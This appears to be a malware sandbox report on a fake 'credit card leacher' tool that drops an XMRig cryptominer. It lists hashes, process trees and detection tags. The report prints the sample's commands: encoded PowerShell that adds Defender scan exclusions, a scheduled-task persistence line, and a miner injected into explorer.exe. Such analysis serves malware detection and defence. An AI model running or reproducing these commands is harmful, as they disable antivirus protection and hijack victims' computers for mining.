Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
22/12/2024, 03:21
Static task
static1
Behavioral task
behavioral1
Sample
Credit Card Leacher Updated.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Credit Card Leacher Updated.exe
Resource
win10v2004-20241007-en
General
-
Target
Credit Card Leacher Updated.exe
-
Size
39.6MB
-
MD5
1a66e85ed92c4b32a2bd9f05c618f09a
-
SHA1
9cae80b15315271cce4e941f2e05cd7147963e21
-
SHA256
747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd
-
SHA512
cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95
-
SSDEEP
49152:N7aJSKwMWHXN8K5vWXHbQbW0Bzip3iLXL47MUvu6w0BoiO9ix2NfjIfJvndZ1QUF:
Malware Config
Signatures
-
Xmrig family
-
XMRig Miner payload 17 IoCs
resource yara_rule behavioral1/memory/2204-58-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-46-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-52-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-63-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-60-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-56-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-54-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-64-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-50-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-49-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-44-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-66-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-67-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-68-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-69-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-70-0x0000000140000000-0x0000000140787000-memory.dmp xmrig behavioral1/memory/2204-71-0x0000000140000000-0x0000000140787000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 2216 services.exe -
Loads dropped DLL 1 IoCs
pid Process 108 cmd.exe -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2216 set thread context of 2204 2216 services.exe 46 -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2976 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 1860 powershell.exe 2732 powershell.exe 2728 powershell.exe 908 powershell.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe 2204 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 1860 powershell.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 2728 powershell.exe Token: SeDebugPrivilege 908 powershell.exe Token: SeLockMemoryPrivilege 2204 explorer.exe Token: SeLockMemoryPrivilege 2204 explorer.exe -
Suspicious use of WriteProcessMemory 46 IoCs
description pid Process procid_target PID 2808 wrote to memory of 2948 2808 Credit Card Leacher Updated.exe 30 PID 2808 wrote to memory of 2948 2808 Credit Card Leacher Updated.exe 30 PID 2808 wrote to memory of 2948 2808 Credit Card Leacher Updated.exe 30 PID 2948 wrote to memory of 1860 2948 cmd.exe 32 PID 2948 wrote to memory of 1860 2948 cmd.exe 32 PID 2948 wrote to memory of 1860 2948 cmd.exe 32 PID 2948 wrote to memory of 2732 2948 cmd.exe 33 PID 2948 wrote to memory of 2732 2948 cmd.exe 33 PID 2948 wrote to memory of 2732 2948 cmd.exe 33 PID 2808 wrote to memory of 2648 2808 Credit Card Leacher Updated.exe 34 PID 2808 wrote to memory of 2648 2808 Credit Card Leacher Updated.exe 34 PID 2808 wrote to memory of 2648 2808 Credit Card Leacher Updated.exe 34 PID 2648 wrote to memory of 2976 2648 cmd.exe 36 PID 2648 wrote to memory of 2976 2648 cmd.exe 36 PID 2648 wrote to memory of 2976 2648 cmd.exe 36 PID 2808 wrote to memory of 108 2808 Credit Card Leacher Updated.exe 37 PID 2808 wrote to memory of 108 2808 Credit Card Leacher Updated.exe 37 PID 2808 wrote to memory of 108 2808 Credit Card Leacher Updated.exe 37 PID 108 wrote to memory of 2216 108 cmd.exe 39 PID 108 wrote to memory of 2216 108 cmd.exe 39 PID 108 wrote to memory of 2216 108 cmd.exe 39 PID 2216 wrote to memory of 2512 2216 services.exe 40 PID 2216 wrote to memory of 2512 2216 services.exe 40 PID 2216 wrote to memory of 2512 2216 services.exe 40 PID 2512 wrote to memory of 2728 2512 cmd.exe 42 PID 2512 wrote to memory of 2728 2512 cmd.exe 42 PID 2512 wrote to memory of 2728 2512 cmd.exe 42 PID 2512 wrote to memory of 908 2512 cmd.exe 43 PID 2512 wrote to memory of 908 2512 cmd.exe 43 PID 2512 wrote to memory of 908 2512 cmd.exe 43 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 PID 2216 wrote to memory of 2204 2216 services.exe 46 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe"C:\Users\Admin\AppData\Local\Temp\Credit Card Leacher Updated.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2732
-
-
-
C:\Windows\system32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\Admin\Microsoft\services.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2976
-
-
-
C:\Windows\system32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Microsoft\services.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:108 -
C:\Users\Admin\Microsoft\services.exeC:\Users\Admin\Microsoft\services.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2216 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit4⤵
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe rgzpgjdhvtrpdhhm0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB/QqEHKsc9yzR1WCQJ7J8y4FJYAp32SMQk+tLqNtiHL0PjBuVZABQ5ukZR7e0SRfX4xEoiLmw1vlCGjE3tD9jkaW0Eb3g8xC853ExIyl3HXWE4KJSqUta4SlK9ap4/lUG7HSkPpOIdCfGQjSInh0JdS48s7Oabg9uN3CnrI68x9uM+MwDGCSH2OOWc3n3R2wFXXGQeHnv1fJecZzwkB29i7BNrwykLdw+WMPR8DFl3LhypSUf+F8CiC9ldILCynMFSmlYucQSU8v0a+LG2gPkyvi+vQ+Vp0gurA3OjTRVWoPffxhqXVSy8+sZ90fNdq3Ocr+86JU3WhmIz1dp84geiw=4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52d7188b6a478d7d6cb46588060bc122e
SHA1f13e08dc96dff0a4e629ba6962b5885fe5814a09
SHA256fd8cbf9fdfbe2a89ceb052fae3b1ce85c87c9b1a7adefbf5b355f14d03c50818
SHA512d41382a48be6fb257f19c5e4c107b5f8979320bc35760e60fcbe9e858805e7eb778af174a5161e5ceab8f32a468fa0afddff34f83e84e1f0a0f4d10e8777c6f2
-
Filesize
39.6MB
MD51a66e85ed92c4b32a2bd9f05c618f09a
SHA19cae80b15315271cce4e941f2e05cd7147963e21
SHA256747bdbf0fba77bf78a49dda85bfa1d595fb12468b6b8b8e89aa7dcc5fb610acd
SHA512cf6a2a8eab861572345033f1955f55c8d2ab4a477d67d1343006564434693e112f362a4c59d45524825dd6fd429fcac17132b6a964e8519bcc1d6513d09a0e95